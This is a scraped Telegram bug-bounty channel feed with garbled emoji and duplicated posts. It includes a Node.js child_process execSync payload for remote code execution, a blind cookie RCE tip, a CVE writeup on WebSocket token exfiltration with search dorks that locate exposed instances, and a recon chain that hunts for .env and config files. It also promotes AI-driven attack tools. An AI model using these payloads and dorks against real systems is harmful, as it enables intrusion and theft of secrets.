Brut Security pinned ยซ๐ ๐ ๐ ๐ Please donโt forget to react to the post and share it. Your reactions motivate us to post more content like this. You can also tap the โญ๏ธ to show your support. Thanks!๐ ๐ ๐ ยป
Hey Hunter's,
DarkShadow is here back again!
๐Blind Remote Code Execution in Cookiesโ
NOTE:
โin some servers use sh as default not bash, so in your payload sh payloads are perfect.
โdon't forget to check the cookies while you tested any webapp, because in some cases Cookies are intersect with bash process.
โLast but seriously important, Always use burp collab for blind testing...
So guy's if you really Enjoy to read my such methods then show your love โฅ๏ธ
#bugbountytips #rce #darkshadow
DarkShadow is here back again!
๐Blind Remote Code Execution in Cookiesโ
NOTE:
โin some servers use sh as default not bash, so in your payload sh payloads are perfect.
โdon't forget to check the cookies while you tested any webapp, because in some cases Cookies are intersect with bash process.
โLast but seriously important, Always use burp collab for blind testing...
So guy's if you really Enjoy to read my such methods then show your love โฅ๏ธ
#bugbountytips #rce #darkshadow
โค8๐ฅ3๐1
๐จ CVE-2026-25253: OpenClaw Logical Flaw
Critical Token Leakage via Unsanitized WebSocket Redirect!
An attacker crafts a malicious URL containing a controlled gatewayUrl query parameter and embedded token, causing OpenClaw to silently establish a WebSocket connection to the attacker-controlled endpoint and exfiltrate the sensitive token without user interaction or consent.
Full Vulnerability Details & Analysis at DarkEye:
๐ https://darkeye.org/vuln/cve/CVE-2026-25253
๐ Identify Targets via ZoomEye:
Filter: vul.cve="CVE-2026-25253"
Search Dork: app="OpenClaw"
Exposure: 33k+ instances identified globally.
ZoomEye Search Link:
๐ https://www.zoomeye.ai/searchResult?q=YXBwPSJPcGVuQ2xhdyI=&utm_source=twitter&utm_medium=social&utm_campaign=cve_ops_20260213
Critical Token Leakage via Unsanitized WebSocket Redirect!
An attacker crafts a malicious URL containing a controlled gatewayUrl query parameter and embedded token, causing OpenClaw to silently establish a WebSocket connection to the attacker-controlled endpoint and exfiltrate the sensitive token without user interaction or consent.
Full Vulnerability Details & Analysis at DarkEye:
๐ https://darkeye.org/vuln/cve/CVE-2026-25253
๐ Identify Targets via ZoomEye:
Filter: vul.cve="CVE-2026-25253"
Search Dork: app="OpenClaw"
Exposure: 33k+ instances identified globally.
ZoomEye Search Link:
๐ https://www.zoomeye.ai/searchResult?q=YXBwPSJPcGVuQ2xhdyI=&utm_source=twitter&utm_medium=social&utm_campaign=cve_ops_20260213
โค2๐ฅ2
Hey Hunterโs,
DarkShadow is here back again, dropping a another RCE methd!
Remote Code Execution - js framework
process.mainModule.require('child_process').execSync('id').toString()
THIS IS A VERY EFFECTIVE PAYLOAD FOR RCE IN JS FRAMEWORK, so when you test any js based webapp don't forget to apply it
#bugbountytips #rce
DarkShadow is here back again, dropping a another RCE methd!
Remote Code Execution - js framework
process.mainModule.require('child_process').execSync('id').toString()
THIS IS A VERY EFFECTIVE PAYLOAD FOR RCE IN JS FRAMEWORK, so when you test any js based webapp don't forget to apply it
#bugbountytips #rce
๐ฅ4
๐ค Hackersโ Valentineโs Day be likeโฆ ๐ป
Love is temporary,
But bug bounty is permanent.
๐ฅ !SO STAY HACKED! ๐ฅ
Love is temporary,
But bug bounty is permanent.
๐ฅ !SO STAY HACKED! ๐ฅ
โค8
On February 14, we crossed 100,000 total views on the Brut Security YouTube channel.
If you are new here, welcome to a community built on real skills and real mindset.
Please open Telegram to view this post
VIEW IN TELEGRAM
2โค9๐ฅ1๐1
Forwarded from โธ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ Moonfoxes ๐
The results come very quickly!
DM @Mm_fit
Channel https://t.me/cve0day
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ4โค1๐1
Please open Telegram to view this post
VIEW IN TELEGRAM
๐3
๐ฅ BB TIP: Automate Secret Hunting Like a Pro
Manual hunting is slow. Automation scales.
Instead of randomly browsing subdomains, pipe your recon properly:
What this really means is:
โข subfinder โ enumerate subdomains
โข httpx โ filter alive hosts
โข gau โ pull historical URLs
โข grep โ hunt for juicy patterns like .env, config, backup
Youโre basically combining live assets + historical endpoints + pattern filtering in one clean chain.
This approach often reveals:
Exposed environment files
Backup endpoints
Forgotten config files
Hidden OpenID configurations
JS config leaks
Most hunters stop at subdomain enumeration. Smart hunters pivot into URL discovery and pattern extraction.
Automation doesnโt replace thinking. It multiplies it.
Test responsibly. Stay within scope. Move fast, think slow.
Manual hunting is slow. Automation scales.
Instead of randomly browsing subdomains, pipe your recon properly:
subfinder -d target.com -silent | httpx -silent | gau | grep -Ei "\.env|config|backup"
What this really means is:
โข subfinder โ enumerate subdomains
โข httpx โ filter alive hosts
โข gau โ pull historical URLs
โข grep โ hunt for juicy patterns like .env, config, backup
Youโre basically combining live assets + historical endpoints + pattern filtering in one clean chain.
This approach often reveals:
Exposed environment files
Backup endpoints
Forgotten config files
Hidden OpenID configurations
JS config leaks
Most hunters stop at subdomain enumeration. Smart hunters pivot into URL discovery and pattern extraction.
Automation doesnโt replace thinking. It multiplies it.
Test responsibly. Stay within scope. Move fast, think slow.
โค14๐1
๐ SILENTCHAIN Pro v1.1.0 Powered by deepseek-v3.1:671b (via Ollama cloud)
Target scanned: http://aspnet.testinvicti.com
Results:
โข Total findings: 151
โข Verified: 20
โข Breakdown: 16 High / 37 Medium / 63 Low / 35 Info
Scan time: 19 minutes
AI requests: 137
Tokens used: 138K
OWASP Top 10 coverage + passive LLM-powered analysis for Burp Suite
๐ https://silentchain.ai
Target scanned: http://aspnet.testinvicti.com
Results:
โข Total findings: 151
โข Verified: 20
โข Breakdown: 16 High / 37 Medium / 63 Low / 35 Info
Scan time: 19 minutes
AI requests: 137
Tokens used: 138K
OWASP Top 10 coverage + passive LLM-powered analysis for Burp Suite
๐ https://silentchain.ai
๐7โค4
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ซก4
Please open Telegram to view this post
VIEW IN TELEGRAM
Medium
Subdomain Takeover: One of the Most Misunderstood Bug Bounty Vulnerabilities
Anyone who spends time in reconnaissance has seen subdomains pointing to external platforms such as GitHub Pages, Heroku, Vercel, AWS S3โฆ
โค13๐2
Don't forget to drop likes, it keeps motivate us to put such contents. Thanks Everyone ๐ฎ
Please open Telegram to view this post
VIEW IN TELEGRAM
๐14โค4
Autonomous Multi-Agent Based Red Team Testing Service, AI hacker.
- http://github.com/PurpleAILAB/Decepticon
- http://github.com/PurpleAILAB/Decepticon
โค7๐4๐1